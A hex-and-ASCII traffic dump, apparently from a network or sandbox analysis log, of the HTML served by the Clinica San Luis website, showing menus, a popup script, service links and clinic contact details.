                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC120INData Raw: 6f 72 69 7a 6f 6e 74 61 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67
                                                                                                                                                                                                                                                  Data Ascii: orizontal.png" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC121INData Raw: 22 20 68 72 65 66 3d 22 23 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: " href="#" data-g-menuparent=""><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-cont
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC122INData Raw: 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75
                                                                                                                                                                                                                                                  Data Ascii: ntent"><span class="g-menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menu
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC124INData Raw: 63 61 2f 70 6f 6c 69 74 69 63 61 73 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68
                                                                                                                                                                                                                                                  Data Ascii: ca/politicas-institucionales"><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" h
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC125INData Raw: 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76
                                                                                                                                                                                                                                                  Data Ascii: iner" href="/index.php/nuestra-clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactiv
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC126INData Raw: 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45
                                                                                                                                                                                                                                                  Data Ascii: em g-menu-item-type-component g-menu-item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">E
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC128INData Raw: 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 53 49 43 4f 46 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d
                                                                                                                                                                                                                                                  Data Ascii: s="g-menu-item-title">SICOF</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-m
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC129INData Raw: 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 63 72 c3 ad 62 65 6e 6f 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20
                                                                                                                                                                                                                                                  Data Ascii: ><span class="g-menu-item-title">Escrbenos</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC131INData Raw: 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f
                                                                                                                                                                                                                                                  Data Ascii: ><li class="g-menu-item g-menu-item-type-component g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC132INData Raw: 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 74 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a
                                                                                                                                                                                                                                                  Data Ascii: </div></div> </div><div class="platform-content"><div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity:
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC133INData Raw: 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 6f 70 65 6e 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: elastic, fade or none openSpeed : 250, closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC135INData Raw: 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 09 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 73 74 75 66 66 28 62 6f 78 69 64 29 7b 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78
                                                                                                                                                                                                                                                  Data Ascii: e.display = "none";}function hidestuff(boxid){ document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC136INData Raw: 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65
                                                                                                                                                                                                                                                  Data Ascii: matedblock "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animate
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC137INData Raw: 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22
                                                                                                                                                                                                                                                  Data Ascii: c="/images/rocketlauncher/home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC139INData Raw: 74 69 63 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69
                                                                                                                                                                                                                                                  Data Ascii: tico.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></fi
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC140INData Raw: 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f
                                                                                                                                                                                                                                                  Data Ascii: div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutto
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC141INData Raw: 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f
                                                                                                                                                                                                                                                  Data Ascii: er"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC143INData Raw: 65 63 74 65 64 5d 3c 2f 61 3e 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 43 6f 6e 73 75 6c 74 61 20 45 78 74 65 72 6e 61 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 33 2d 20 4f 70 63 69 c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73
                                                                                                                                                                                                                                                  Data Ascii: ected]</a></br><br></br><strong>Citas Consulta Externa: <p>6076430023- Opcin 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><s
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC144INData Raw: 6e 3c 2f 68 33 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 20 67 2d 63 6f 6e 74 61 63 74 2d 63 6f 6d 70 61 63 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74
                                                                                                                                                                                                                                                  Data Ascii: n</h3><div class="g-contact g-contact-compact"><div class="g-contact-item"><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sot
